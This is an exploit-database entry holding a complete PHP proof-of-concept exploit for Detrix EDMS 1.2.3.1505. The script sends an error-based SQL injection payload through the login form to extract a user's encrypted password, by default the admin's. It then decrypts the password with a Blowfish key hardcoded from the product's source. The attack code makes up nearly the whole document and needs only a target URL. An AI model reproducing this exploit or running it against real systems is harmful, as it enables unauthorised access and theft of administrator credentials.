Detrix EDMS 1.2.3.1505 - SQL Injection

2019-10-02
ID: 102033
CVE: None
Download vulnerable application: None
#!/usr/bin/php

/*
# Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit

# Google Dork:
# Date: Jul 2019
# Exploit Author: Burov Konstantin
# Vendor Homepage: forum.detrix.kz
# Software Link:
https://www.documentov.com/index.php?route=document/search&search=1.2.3.1505.zip&page=1&limit=20&document_uid=3d7bae5a-c2e5-11e8-9ed8-b7ed7eb0f5bb
# Version: any
# Tested on: Detrix 1.2.3.1505
*/

<?php

/*---------------------------CHANGE-ME--------------------------------*/

$URL = "http://192.168.56.6"; // Set URL for the target host
$user_id = 0; // 0 - Default admin ID

/*--------------------------------------------------------------------*/

$banner = "Exploiting SQLi vuln and password decrypting for Detrix\n".
	"https://github.com/sadshade/Detrix-Passwords-PoC" target="_blank">http://forum.detrix.kz\nhttps://github.com/sadshade/Detrix-Passwords-PoC \n".
	"[email protected], 2019.\n\n";

// SQLi request
$sql_req =
	"login' AND 99=CAST('a__'||(SELECT COALESCE(CAST(password AS ".
	"CHARACTER(10000)),(CHR(32))) FROM manuscript.ref_system_users OR".
	"DER BY id OFFSET " . $user_id . " LIMIT 1)::text||'__a' ".
	"AS NUMERIC) AND 'a'='a";

$data = array('password' => 'pass',
	'login' => $sql_req);

$options = array(
    'http' => array(
        'header' => "Content-type: application/x-www-form-urlencoded\r\n",
        'method' => 'POST',
        'content' => http_build_query($data)
    )
);

// Key from %detrix%/system/utils/MSF_string.php
$sSuperDuperSecretKey =
	"!-eeflslskdjfla;456864~}{[email protected]#$%#$9f0sf8a723#@";

echo $banner;

try {
	$context  = stream_context_create($options);
	echo "Send SQLi to $URL...\n";
	$result = file_get_contents($URL, false, $context);
} catch (Exception $e) {
    echo 'Error: ',  $e->getMessage(), "\n";
}

if ($result != "") {
	if (preg_match("/\"a__(.+)__a\"/", $result, $encrypted_pass) == 1) {

		$clear_pass = trim(
			openssl_decrypt(base64_decode($encrypted_pass[1]),
			"BF-ECB", $sSuperDuperSecretKey,
			OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING)
		); // Decrypt pass
		echo "Pass for User id $user_id: $clear_pass \n";
	} else echo "Error: no such User id:$user_id or empty password!\n";
} else echo "Error: empty Response or error!\n"

?>
1.3.0 (www01)